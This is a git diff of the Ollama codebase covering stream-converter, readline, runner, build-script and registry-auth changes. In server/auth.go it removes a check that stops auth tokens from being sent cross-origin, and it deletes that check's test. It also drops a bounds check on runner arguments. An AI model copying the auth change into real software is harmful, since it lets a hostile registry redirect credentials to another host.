 	firstWrite      bool
@@ -805,12 +668,11 @@ func (c *ResponsesStreamConverter) newEvent(eventType string, data map[string]an
 }

 // NewResponsesStreamConverter creates a new converter with the given configuration.
-func NewResponsesStreamConverter(responseID, itemID, model string, request ResponsesRequest) *ResponsesStreamConverter {
+func NewResponsesStreamConverter(responseID, itemID, model string) *ResponsesStreamConverter {
 	return &ResponsesStreamConverter{
 		responseID: responseID,
 		itemID:     itemID,
 		model:      model,
-		request:    request,
 		firstWrite: true,
 	}
 }
@@ -855,120 +717,25 @@ func (c *ResponsesStreamConverter) Process(r api.ChatResponse) []ResponsesStream
 	return events
 }

-// buildResponseObject creates a full response object with all required fields for streaming events.
-func (c *ResponsesStreamConverter) buildResponseObject(status string, output []any, usage map[string]any) map[string]any {
-	var instructions any = nil
-	if c.request.Instructions != "" {
-		instructions = c.request.Instructions
-	}
-
-	truncation := "disabled"
-	if c.request.Truncation != nil {
-		truncation = *c.request.Truncation
-	}
-
-	var tools []any
-	if c.request.Tools != nil {
-		for _, t := range c.request.Tools {
-			tools = append(tools, map[string]any{
-				"type":        t.Type,
-				"name":        t.Name,
-				"description": t.Description,
-				"strict":      t.Strict,
-				"parameters":  t.Parameters,
-			})
-		}
-	}
-	if tools == nil {
-		tools = []any{}
-	}
-
-	textFormat := map[string]any{"type": "text"}
-	if c.request.Text != nil && c.request.Text.Format != nil {
-		textFormat = map[string]any{
-			"type": c.request.Text.Format.Type,
-		}
-		if c.request.Text.Format.Name != "" {
-			textFormat["name"] = c.request.Text.Format.Name
-		}
-		if c.request.Text.Format.Schema != nil {
-			textFormat["schema"] = c.request.Text.Format.Schema
-		}
-		if c.request.Text.Format.Strict != nil {
-			textFormat["strict"] = *c.request.Text.Format.Strict
-		}
-	}
-
-	var reasoning any = nil
-	if c.request.Reasoning.Effort != "" || c.request.Reasoning.Summary != "" {
-		r := map[string]any{}
-		if c.request.Reasoning.Effort != "" {
-			r["effort"] = c.request.Reasoning.Effort
-		} else {
-			r["effort"] = nil
-		}
-		if c.request.Reasoning.Summary != "" {
-			r["summary"] = c.request.Reasoning.Summary
-		} else {
-			r["summary"] = nil
-		}
-		reasoning = r
-	}
-
-	// Build top_p and temperature with defaults
-	topP := 1.0
-	if c.request.TopP != nil {
-		topP = *c.request.TopP
-	}
-	temperature := 1.0
-	if c.request.Temperature != nil {
-		temperature = *c.request.Temperature
-	}
-
-	return map[string]any{
-		"id":                   c.responseID,
-		"object":               "response",
-		"created_at":           time.Now().Unix(),
-		"completed_at":         nil,
-		"status":               status,
-		"incomplete_details":   nil,
-		"model":                c.model,
-		"previous_response_id": nil,
-		"instructions":         instructions,
-		"output":               output,
-		"error":                nil,
-		"tools":                tools,
-		"tool_choice":          "auto",
-		"truncation":           truncation,
-		"parallel_tool_calls":  true,
-		"text":                 map[string]any{"format": textFormat},
-		"top_p":                topP,
-		"presence_penalty":     0,
-		"frequency_penalty":    0,
-		"top_logprobs":         0,
-		"temperature":          temperature,
-		"reasoning":            reasoning,
-		"usage":                usage,
-		"max_output_tokens":    c.request.MaxOutputTokens,
-		"max_tool_calls":       nil,
-		"store":                false,
-		"background":           c.request.Background,
-		"service_tier":         "default",
-		"metadata":             map[string]any{},
-		"safety_identifier":    nil,
-		"prompt_cache_key":     nil,
-	}
-}
-
 func (c *ResponsesStreamConverter) createResponseCreatedEvent() ResponsesStreamEvent {
 	return c.newEvent("response.created", map[string]any{
-		"response": c.buildResponseObject("in_progress", []any{}, nil),
+		"response": map[string]any{
+			"id":     c.responseID,
+			"object": "response",
+			"status": "in_progress",
+			"output": []any{},
+		},
 	})
 }

 func (c *ResponsesStreamConverter) createResponseInProgressEvent() ResponsesStreamEvent {
 	return c.newEvent("response.in_progress", map[string]any{
-		"response": c.buildResponseObject("in_progress", []any{}, nil),
+		"response": map[string]any{
+			"id":     c.responseID,
+			"object": "response",
+			"status": "in_progress",
+			"output": []any{},
+		},
 	})
 }

@@ -995,10 +762,9 @@ func (c *ResponsesStreamConverter) processThinking(thinking string) []ResponsesS

 	// Emit delta
 	events = append(events, c.newEvent("response.reasoning_summary_text.delta", map[string]any{
-		"item_id":       c.reasoningItemID,
-		"output_index":  c.outputIndex,
-		"summary_index": 0,
-		"delta":         thinking,
+		"item_id":      c.reasoningItemID,
+		"output_index": c.outputIndex,
+		"delta":        thinking,
 	}))

 	// TODO(drifkin): consider adding
@@ -1017,10 +783,9 @@ func (c *ResponsesStreamConverter) finishReasoning() []ResponsesStreamEvent {

 	events := []ResponsesStreamEvent{
 		c.newEvent("response.reasoning_summary_text.done", map[string]any{
-			"item_id":       c.reasoningItemID,
-			"output_index":  c.outputIndex,
-			"summary_index": 0,
-			"text":          c.accumulatedThinking,
+			"item_id":      c.reasoningItemID,
+			"output_index": c.outputIndex,
+			"text":         c.accumulatedThinking,
 		}),
 		c.newEvent("response.output_item.done", map[string]any{
 			"output_index": c.outputIndex,
@@ -1133,10 +898,8 @@ func (c *ResponsesStreamConverter) processTextContent(content string) []Response
 			"output_index":  c.outputIndex,
 			"content_index": c.contentIndex,
 			"part": map[string]any{
-				"type":        "output_text",
-				"text":        "",
-				"annotations": []any{},
-				"logprobs":    []any{},
+				"type": "output_text",
+				"text": "",
 			},
 		}))
 	}
@@ -1150,7 +913,6 @@ func (c *ResponsesStreamConverter) processTextContent(content string) []Response
 		"output_index":  c.outputIndex,
 		"content_index": 0,
 		"delta":         content,
-		"logprobs":      []any{},
 	}))

 	return events
@@ -1182,10 +944,8 @@ func (c *ResponsesStreamConverter) buildFinalOutput() []any {
 			"status": "completed",
 			"role":   "assistant",
 			"content": []map[string]any{{
-				"type":        "output_text",
-				"text":        c.accumulatedText,
-				"annotations": []any{},
-				"logprobs":    []any{},
+				"type": "output_text",
+				"text": c.accumulatedText,
 			}},
 		})
 	}
@@ -1207,7 +967,6 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
 			"output_index":  c.outputIndex,
 			"content_index": 0,
 			"text":          c.accumulatedText,
-			"logprobs":      []any{},
 		}))

 		// response.content_part.done
@@ -1216,10 +975,8 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
 			"output_index":  c.outputIndex,
 			"content_index": 0,
 			"part": map[string]any{
-				"type":        "output_text",
-				"text":        c.accumulatedText,
-				"annotations": []any{},
-				"logprobs":    []any{},
+				"type": "output_text",
+				"text": c.accumulatedText,
 			},
 		}))

@@ -1232,31 +989,26 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
 				"status": "completed",
 				"role":   "assistant",
 				"content": []map[string]any{{
-					"type":        "output_text",
-					"text":        c.accumulatedText,
-					"annotations": []any{},
-					"logprobs":    []any{},
+					"type": "output_text",
+					"text": c.accumulatedText,
 				}},
 			},
 		}))
 	}

 	// response.completed
-	usage := map[string]any{
-		"input_tokens":  r.PromptEvalCount,
-		"output_tokens": r.EvalCount,
-		"total_tokens":  r.PromptEvalCount + r.EvalCount,
-		"input_tokens_details": map[string]any{
-			"cached_tokens": 0,
-		},
-		"output_tokens_details": map[string]any{
-			"reasoning_tokens": 0,
-		},
-	}
-	response := c.buildResponseObject("completed", c.buildFinalOutput(), usage)
-	response["completed_at"] = time.Now().Unix()
 	events = append(events, c.newEvent("response.completed", map[string]any{
-		"response": response,
+		"response": map[string]any{
+			"id":     c.responseID,
+			"object": "response",
+			"status": "completed",
+			"output": c.buildFinalOutput(),
+			"usage": map[string]any{
+				"input_tokens":  r.PromptEvalCount,
+				"output_tokens": r.EvalCount,
+				"total_tokens":  r.PromptEvalCount + r.EvalCount,
+			},
+		},
 	}))

 	return events
--- a/openai/responses_test.go
+++ b/openai/responses_test.go
@@ -850,7 +850,7 @@ func TestFromResponsesRequest_Images(t *testing.T) {
 }

 func TestResponsesStreamConverter_TextOnly(t *testing.T) {
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// First chunk with content
 	events := converter.Process(api.ChatResponse{
@@ -916,7 +916,7 @@ func TestResponsesStreamConverter_TextOnly(t *testing.T) {
 }

 func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{
@@ -952,7 +952,7 @@ func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
 }

 func TestResponsesStreamConverter_Reasoning(t *testing.T) {
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// First chunk with thinking
 	events := converter.Process(api.ChatResponse{
@@ -1267,7 +1267,7 @@ func TestToResponse_WithReasoning(t *testing.T) {
 			Content:  "The answer is 42",
 		},
 		Done: true,
-	}, ResponsesRequest{})
+	})

 	// Should have 2 output items: reasoning + message
 	if len(response.Output) != 2 {
@@ -1638,7 +1638,7 @@ func TestFromResponsesRequest_ShorthandFormats(t *testing.T) {

 func TestResponsesStreamConverter_OutputIncludesContent(t *testing.T) {
 	// Verify that response.output_item.done includes content field for messages
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// First chunk
 	converter.Process(api.ChatResponse{
@@ -1686,7 +1686,7 @@ func TestResponsesStreamConverter_OutputIncludesContent(t *testing.T) {

 func TestResponsesStreamConverter_ResponseCompletedIncludesOutput(t *testing.T) {
 	// Verify that response.completed includes the output array
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// Process some content
 	converter.Process(api.ChatResponse{
@@ -1730,7 +1730,7 @@ func TestResponsesStreamConverter_ResponseCompletedIncludesOutput(t *testing.T)

 func TestResponsesStreamConverter_ResponseCreatedIncludesOutput(t *testing.T) {
 	// Verify that response.created includes an empty output array
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{Content: "Hi"},
@@ -1757,7 +1757,7 @@ func TestResponsesStreamConverter_ResponseCreatedIncludesOutput(t *testing.T) {

 func TestResponsesStreamConverter_SequenceNumbers(t *testing.T) {
 	// Verify that events include incrementing sequence numbers
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{Content: "Hello"},
@@ -1791,7 +1791,7 @@ func TestResponsesStreamConverter_SequenceNumbers(t *testing.T) {

 func TestResponsesStreamConverter_FunctionCallStatus(t *testing.T) {
 	// Verify that function call items include status field
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{
--- a/progress/stepbar.go
+++ b/progress/stepbar.go
@@ -1,33 +0,0 @@
-package progress
-
-import (
-	"fmt"
-	"strings"
-)
-
-// StepBar displays step-based progress (e.g., for image generation steps).
-type StepBar struct {
-	message string
-	current int
-	total   int
-}
-
-func NewStepBar(message string, total int) *StepBar {
-	return &StepBar{message: message, total: total}
-}
-
-func (s *StepBar) Set(current int) {
-	s.current = current
-}
-
-func (s *StepBar) String() string {
-	percent := float64(s.current) / float64(s.total) * 100
-	barWidth := s.total
-	empty := barWidth - s.current
-
-	// "Generating   0% ▕         ▏ 0/9"
-	return fmt.Sprintf("%s %3.0f%% ▕%s%s▏ %d/%d",
-		s.message, percent,
-		strings.Repeat("█", s.current), strings.Repeat(" ", empty),
-		s.current, s.total)
-}
--- a/readline/readline.go
+++ b/readline/readline.go
@@ -5,7 +5,6 @@ import (
 	"fmt"
 	"io"
 	"os"
-	"strings"
 )

 type Prompt struct {
@@ -37,11 +36,10 @@ type Terminal struct {
 }

 type Instance struct {
-	Prompt      *Prompt
-	Terminal    *Terminal
-	History     *History
-	Pasting     bool
-	pastedLines []string
+	Prompt   *Prompt
+	Terminal *Terminal
+	History  *History
+	Pasting  bool
 }

 func New(prompt Prompt) (*Instance, error) {
@@ -176,8 +174,6 @@ func (i *Instance) Readline() (string, error) {
 		case CharEsc:
 			esc = true
 		case CharInterrupt:
-			i.pastedLines = nil
-			i.Prompt.UseAlt = false
 			return "", ErrInterrupt
 		case CharPrev:
 			i.historyPrev(buf, &currentLineBuf)
@@ -192,23 +188,7 @@ func (i *Instance) Readline() (string, error) {
 		case CharForward:
 			buf.MoveRight()
 		case CharBackspace, CharCtrlH:
-			if buf.IsEmpty() && len(i.pastedLines) > 0 {
-				lastIdx := len(i.pastedLines) - 1
-				prevLine := i.pastedLines[lastIdx]
-				i.pastedLines = i.pastedLines[:lastIdx]
-				fmt.Print(CursorBOL + ClearToEOL + CursorUp + CursorBOL + ClearToEOL)
-				if len(i.pastedLines) == 0 {
-					fmt.Print(i.Prompt.Prompt)
-					i.Prompt.UseAlt = false
-				} else {
-					fmt.Print(i.Prompt.AltPrompt)
-				}
-				for _, r := range prevLine {
-					buf.Add(r)
-				}
-			} else {
-				buf.Remove()
-			}
+			buf.Remove()
 		case CharTab:
 			// todo: convert back to real tabs
 			for range 8 {
@@ -231,28 +211,13 @@ func (i *Instance) Readline() (string, error) {
 		case CharCtrlZ:
 			fd := os.Stdin.Fd()
 			return handleCharCtrlZ(fd, i.Terminal.termios)
-		case CharCtrlJ:
-			i.pastedLines = append(i.pastedLines, buf.String())
-			buf.Buf.Clear()
-			buf.Pos = 0
-			buf.DisplayPos = 0
-			buf.LineHasSpace.Clear()
-			fmt.Println()
-			fmt.Print(i.Prompt.AltPrompt)
-			i.Prompt.UseAlt = true
-			continue
-		case CharEnter:
+		case CharEnter, CharCtrlJ:
 			output := buf.String()
-			if len(i.pastedLines) > 0 {
-				output = strings.Join(i.pastedLines, "\n") + "\n" + output
-				i.pastedLines = nil
-			}
 			if output != "" {
 				i.History.Add(output)
 			}
 			buf.MoveToEnd()
 			fmt.Println()
-			i.Prompt.UseAlt = false

 			return output, nil
 		default:
--- a/runner/runner.go
+++ b/runner/runner.go
@@ -3,7 +3,6 @@ package runner
 import (
 	"github.com/ollama/ollama/runner/llamarunner"
 	"github.com/ollama/ollama/runner/ollamarunner"
-	imagerunner "github.com/ollama/ollama/x/imagegen/runner"
 )

 func Execute(args []string) error {
@@ -12,19 +11,12 @@ func Execute(args []string) error {
 	}

 	var newRunner bool
-	var imageRunner bool
-	if len(args) > 0 && args[0] == "--ollama-engine" {
+	if args[0] == "--ollama-engine" {
 		args = args[1:]
 		newRunner = true
 	}
-	if len(args) > 0 && args[0] == "--image-engine" {
-		args = args[1:]
-		imageRunner = true
-	}

-	if imageRunner {
-		return imagerunner.Execute(args)
-	} else if newRunner {
+	if newRunner {
 		return ollamarunner.Execute(args)
 	} else {
 		return llamarunner.Execute(args)
--- a/scripts/build_darwin.sh
+++ b/scripts/build_darwin.sh
@@ -60,7 +60,7 @@ _build_darwin() {
            cmake --install $BUILD_DIR --component MLX
            # Override CGO flags to point to the amd64 build directory
            MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
-            MLX_CGO_LDFLAGS="-ldl -lc++ -framework Accelerate -mmacosx-version-min=14.0"
+            MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Accelerate -mmacosx-version-min=14.0"
        else
            BUILD_DIR=build
            cmake --preset MLX \
@@ -71,12 +71,10 @@ _build_darwin() {
            cmake --install $BUILD_DIR --component MLX
            # Use default CGO flags from mlx.go for arm64
            MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
-            MLX_CGO_LDFLAGS="-lc++ -framework Metal -framework Foundation -framework Accelerate -mmacosx-version-min=14.0"
+            MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Metal -framework Foundation -framework Accelerate -mmacosx-version-min=14.0"
        fi
-        GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX .
-        # Copy MLX libraries to same directory as executable for dlopen
-        cp $INSTALL_PREFIX/lib/ollama/libmlxc.dylib $INSTALL_PREFIX/
-        cp $INSTALL_PREFIX/lib/ollama/libmlx.dylib $INSTALL_PREFIX/
+        GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX/imagegen ./x/imagegen/cmd/engine
+        GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 go build -o $INSTALL_PREFIX .
    done
 }

@@ -84,17 +82,19 @@ _sign_darwin() {
    status "Creating universal binary..."
    mkdir -p dist/darwin
    lipo -create -output dist/darwin/ollama dist/darwin-*/ollama
+    lipo -create -output dist/darwin/imagegen dist/darwin-*/imagegen
    chmod +x dist/darwin/ollama
+    chmod +x dist/darwin/imagegen

    if [ -n "$APPLE_IDENTITY" ]; then
-        for F in dist/darwin/ollama dist/darwin-*/lib/ollama/*; do
+        for F in dist/darwin/ollama dist/darwin-*/lib/ollama/* dist/darwin/imagegen; do
            codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime $F
        done

        # create a temporary zip for notarization
        TEMP=$(mktemp -u).zip
        ditto -c -k --keepParent dist/darwin/ollama "$TEMP"
-        xcrun notarytool submit "$TEMP" --wait --timeout 20m --apple-id $APPLE_ID --password $APPLE_PASSWORD --team-id $APPLE_TEAM_ID
+        xcrun notarytool submit "$TEMP" --wait --timeout 10m --apple-id $APPLE_ID --password $APPLE_PASSWORD --team-id $APPLE_TEAM_ID
        rm -f "$TEMP"
    fi

@@ -154,38 +154,38 @@ _build_macapp() {
    mkdir -p dist/Ollama.app/Contents/Resources
    if [ -d dist/darwin-amd64 ]; then
        lipo -create -output dist/Ollama.app/Contents/Resources/ollama dist/darwin-amd64/ollama dist/darwin-arm64/ollama
+        lipo -create -output dist/Ollama.app/Contents/Resources/imagegen dist/darwin-amd64/imagegen dist/darwin-arm64/imagegen
        for F in dist/darwin-amd64/lib/ollama/*mlx*.dylib ; do
            lipo -create -output dist/darwin/$(basename $F) $F dist/darwin-arm64/lib/ollama/$(basename $F)
        done
        cp dist/darwin-*/lib/ollama/*.so dist/darwin-*/lib/ollama/*.dylib dist/Ollama.app/Contents/Resources/
        cp dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
-        # Copy MLX metallib (architecture-independent, just use arm64 version)
-        cp dist/darwin-arm64/lib/ollama/*.metallib dist/Ollama.app/Contents/Resources/ 2>/dev/null || true
    else
        cp -a dist/darwin/ollama dist/Ollama.app/Contents/Resources/ollama
        cp dist/darwin/*.so dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
    fi
+    cp -a dist/darwin/imagegen dist/Ollama.app/Contents/Resources/imagegen
    chmod a+x dist/Ollama.app/Contents/Resources/ollama

    # Sign
    if [ -n "$APPLE_IDENTITY" ]; then
        codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.app/Contents/Resources/ollama
-        for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/*.metallib ; do
+        for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/imagegen ; do
            codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime ${lib}
        done
        codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier com.electron.ollama --deep --options=runtime dist/Ollama.app
    fi

    rm -f dist/Ollama-darwin.zip
-    ditto -c -k --norsrc --keepParent dist/Ollama.app dist/Ollama-darwin.zip
-    (cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama *.so *.dylib *.metallib 2>/dev/null) | gzip -9vc > dist/ollama-darwin.tgz
+    ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip
+    (cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama imagegen *.so *.dylib) | gzip -9vc > dist/ollama-darwin.tgz

    # Notarize and Staple
    if [ -n "$APPLE_IDENTITY" ]; then
-        $(xcrun -f notarytool) submit dist/Ollama-darwin.zip --wait --timeout 20m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
+        $(xcrun -f notarytool) submit dist/Ollama-darwin.zip --wait --timeout 10m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
        rm -f dist/Ollama-darwin.zip
        $(xcrun -f stapler) staple dist/Ollama.app
-        ditto -c -k --norsrc --keepParent dist/Ollama.app dist/Ollama-darwin.zip
+        ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip

        rm -f dist/Ollama.dmg

@@ -206,7 +206,7 @@ _build_macapp() {
        rm -f dist/rw*.dmg

        codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.dmg
-        $(xcrun -f notarytool) submit dist/Ollama.dmg --wait --timeout 20m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
+        $(xcrun -f notarytool) submit dist/Ollama.dmg --wait --timeout 10m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
        $(xcrun -f stapler) staple dist/Ollama.dmg
    else
        echo "WARNING: Code signing disabled, this bundle will not work for upgrade testing"
--- a/scripts/build_linux.sh
+++ b/scripts/build_linux.sh
@@ -48,12 +48,53 @@ if echo $PLATFORM | grep "amd64" > /dev/null; then
        .
 fi

+# Symlink mlx_cuda_<ver>/*.so* files that are sha256-identical to the same-named file in cuda_<ver>; $1 = dist root
+deduplicate_cuda_libs() {
+    local base_dir="$1"
+    echo "Deduplicating CUDA libraries in ${base_dir}..."
+
+    # Visit every mlx_cuda_* directory; an unmatched glob stays literal and is rejected by the -d test
+    for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
+        [ -d "${mlx_dir}" ] || continue
+
+        # Extract CUDA version (e.g., v12, v13) by stripping the mlx_cuda_ prefix
+        cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
+        cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
+
+        # Nothing to deduplicate against when the matching cuda_* directory is absent
+        [ -d "${cuda_dir}" ] || continue
+
+        echo "  Checking ${mlx_dir} against ${cuda_dir}..."
+
+        # Walk regular .so* files; IFS= and -r keep whitespace and backslashes in paths intact
+        find "${mlx_dir}" -type f -name "*.so*" | while IFS= read -r mlx_file; do
+            filename=$(basename "${mlx_file}")
+            cuda_file="${cuda_dir}/${filename}"
+
+            # Only files that also exist under the cuda_* directory are candidates
+            [ -f "${cuda_file}" ] || continue
+
+            # Compare sha256 digests so only byte-identical copies are replaced
+            mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
+            cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
+
+            if [ "${mlx_sum}" = "${cuda_sum}" ]; then
+                echo "    Deduplicating ${filename}"
+                # Relative target: mlx_cuda_<ver> and cuda_<ver> are siblings under lib/ollama
+                rel_path="../cuda_${cuda_version}/${filename}"
+                rm -f "${mlx_file}"
+                ln -s "${rel_path}" "${mlx_file}"
+            fi
+        done
+    done
+}
+
 # Run deduplication for each platform output directory
 if echo $PLATFORM | grep "," > /dev/null ; then
-    $(dirname $0)/deduplicate_cuda_libs.sh "./dist/linux_amd64"
-    $(dirname $0)/deduplicate_cuda_libs.sh "./dist/linux_arm64"
+    deduplicate_cuda_libs "./dist/linux_amd64"
+    deduplicate_cuda_libs "./dist/linux_arm64"
 elif echo $PLATFORM | grep "amd64\|arm64" > /dev/null ; then
-    $(dirname $0)/deduplicate_cuda_libs.sh "./dist"
+    deduplicate_cuda_libs "./dist"
 fi

 # buildx behavior changes for single vs. multiplatform
--- a/scripts/deduplicate_cuda_libs.sh
+++ b/scripts/deduplicate_cuda_libs.sh
@@ -1,60 +0,0 @@
-#!/bin/sh
-#
-# Deduplicate CUDA libraries across mlx_* and cuda_* directories
-# This script finds identical .so* files in mlx_cuda_* directories that exist
-# in corresponding cuda_* directories and replaces them with symlinks.
-#
-
-set -eu
-
-if [ $# -eq 0 ]; then
-    echo "ERROR: No directory specified" >&2
-    echo "Usage: $0 <base_directory>" >&2
-    exit 1
-fi
-
-base_dir="$1"
-
-if [ ! -d "${base_dir}" ]; then
-    echo "ERROR: Directory ${base_dir} does not exist" >&2
-    exit 1
-fi
-
-echo "Deduplicating CUDA libraries in ${base_dir}..."
-
-# Find all mlx_cuda_* directories
-for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
-    [ -d "${mlx_dir}" ] || continue
-
-    # Extract CUDA version (e.g., v12, v13)
-    cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
-    cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
-
-    # Skip if corresponding cuda_* directory doesn't exist
-    [ -d "${cuda_dir}" ] || continue
-
-    echo "  Checking ${mlx_dir} against ${cuda_dir}..."
-
-    # Find all .so* files in mlx directory
-    find "${mlx_dir}" -type f -name "*.so*" | while read mlx_file; do
-        filename=$(basename "${mlx_file}")
-        cuda_file="${cuda_dir}/${filename}"
-
-        # Skip if file doesn't exist in cuda directory
-        [ -f "${cuda_file}" ] || continue
-
-        # Compare checksums
-        mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
-        cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
-
-        if [ "${mlx_sum}" = "${cuda_sum}" ]; then
-            echo "    Deduplicating ${filename}"
-            # Calculate relative path from mlx_dir to cuda_dir
-            rel_path="../cuda_${cuda_version}/${filename}"
-            rm -f "${mlx_file}"
-            ln -s "${rel_path}" "${mlx_file}"
-        fi
-    done
-done
-
-echo "Deduplication complete"
--- a/server/auth.go
+++ b/server/auth.go
@@ -50,17 +50,12 @@ func (r registryChallenge) URL() (*url.URL, error) {
 	return redirectURL, nil
 }

-func getAuthorizationToken(ctx context.Context, challenge registryChallenge, originalHost string) (string, error) {
+func getAuthorizationToken(ctx context.Context, challenge registryChallenge) (string, error) {
 	redirectURL, err := challenge.URL()
 	if err != nil {
 		return "", err
 	}

-	// Validate that the realm host matches the original request host to prevent sending tokens cross-origin.
-	if redirectURL.Host != originalHost {
-		return "", fmt.Errorf("realm host %q does not match original host %q", redirectURL.Host, originalHost)
-	}
-
 	sha256sum := sha256.Sum256(nil)
 	data := []byte(fmt.Sprintf("%s,%s,%s", http.MethodGet, redirectURL.String(), base64.StdEncoding.EncodeToString([]byte(hex.EncodeToString(sha256sum[:])))))

--- a/server/auth_test.go
+++ b/server/auth_test.go
@@ -1,113 +0,0 @@
-package server
-
-import (
-	"context"
-	"strings"
-	"testing"
-	"time"
-)
-
-func TestGetAuthorizationTokenRejectsCrossDomain(t *testing.T) {
-	tests := []struct {
-		realm        string
-		originalHost string
-		wantMismatch bool
-	}{
-		{"https://example.com/token", "example.com", false},
-		{"https://example.com/token", "other.com", true},
-		{"https://example.com/token", "localhost:8000", true},
-		{"https://localhost:5000/token", "localhost:5000", false},
-		{"https://localhost:5000/token", "localhost:6000", true},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.originalHost, func(t *testing.T) {
-			ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond)
-			defer cancel()
-
-			challenge := registryChallenge{Realm: tt.realm, Service: "test", Scope: "repo:x:pull"}
-			_, err := getAuthorizationToken(ctx, challenge, tt.originalHost)
-
-			isMismatch := err != nil && strings.Contains(err.Error(), "does not match")
-			if tt.wantMismatch && !isMismatch {
-				t.Errorf("expected domain mismatch error, got: %v", err)
-			}
-			if !tt.wantMismatch && isMismatch {
-				t.Errorf("unexpected domain mismatch error: %v", err)
-			}
-		})
-	}
-}
-
-func TestParseRegistryChallenge(t *testing.T) {
-	tests := []struct {
-		input                             string
-		wantRealm, wantService, wantScope string
-	}{
-		{
-			`Bearer realm="https://auth.example.com/token",service="registry",scope="repo:foo:pull"`,
-			"https://auth.example.com/token", "registry", "repo:foo:pull",
-		},
-		{
-			`Bearer realm="https://r.ollama.ai/v2/token",service="ollama",scope="-"`,
-			"https://r.ollama.ai/v2/token", "ollama", "-",
-		},
-		{"", "", "", ""},
-	}
-
-	for _, tt := range tests {
-		result := parseRegistryChallenge(tt.input)
-		if result.Realm != tt.wantRealm || result.Service != tt.wantService || result.Scope != tt.wantScope {
-			t.Errorf("parseRegistryChallenge(%q) = {%q, %q, %q}, want {%q, %q, %q}",
-				tt.input, result.Realm, result.Service, result.Scope,
-				tt.wantRealm, tt.wantService, tt.wantScope)
-		}
-	}
-}
-
